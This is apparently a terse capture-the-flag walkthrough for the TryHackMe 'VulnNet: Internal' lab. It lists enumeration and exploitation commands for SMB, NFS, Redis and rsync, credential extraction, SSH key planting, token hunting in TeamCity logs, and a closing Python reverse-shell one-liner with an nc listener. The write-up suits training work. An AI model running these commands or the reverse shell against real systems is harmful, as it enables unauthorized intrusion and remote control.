VulnNet: Internal
Room Link: https://tryhackme.com/room/vulnnetinternal
Initial Scan
Kali
nmap -A $VICTIM
Scan all ports
Kali
nmap -sV -sT -O -p 1-65535 $VICTIM
TCP/139 - NetBIOS
nbtscan $VICTIM
TCP/445 - SMB
In SMB there is the first flag.
Kali
smbget -R smb://$VICTIM/shares
smbclient \\\\$VICTIM\\shares
smb: \> cd temp
smb: \temp\> get services.txt
smb: \temp\> cd ..
smb: \> cd data
smb: \data\> get data.txt
smb: \data\> get business-req.txt 
TCP/2049 - NFS
Kali
showmount -e $VICTIM
mkdir /mnt/nfs
mount $VICTIM:/opt/conf /mnt/nfs
cd /mnt/nfs
cat redis/redis.conf
TCP/6379 - Redis
Kali
redis-cli -h $VICTIM -a "B65Hx562F@ggAZ@F"
10.10.232.200:6379> KEYS *
10.10.232.200:6379> KEYS "internal flag"
10.10.232.200:6379> GET "internal flag"
Kali
KEYS "authlist"
LRANGE authlist 1 100
Kali
echo "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg==" | base64 -d
TCP/873 - RSYNC
We are able to transfer out key to allow us to login to as the sys-internal user.
Kali
rsync --list-only rsync://$VICTIM
rsync --list-only rsync://rsync-connect@$VICTIM/files
Password: Hcg3HP67@TW@Bc72v
ssh-keygen -t rsa
cp ~/.ssh/id_rsa.pub authorized_keys
rsync authorized_keys rsync://rsync-connect@$VICTIM/files/sys-internal/.ssh
Password: Hcg3HP67@TW@Bc72vTCP/22 - SSH
Kali
ssh sys-internal@$VICTIMVictim
ss -ltp
Kali
ssh -D 9050 sys-internal@$VICTIM
Add the token in the Authentication token. There was multiple listed, it was the last one
Victim
grep -iR token /TeamCity/logs/ 2>/dev/null
Kali
nc -lvnp 1337Custom script
export RHOST="$KALI";export RPORT=1337;python3 -c 'import socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")'
Last updated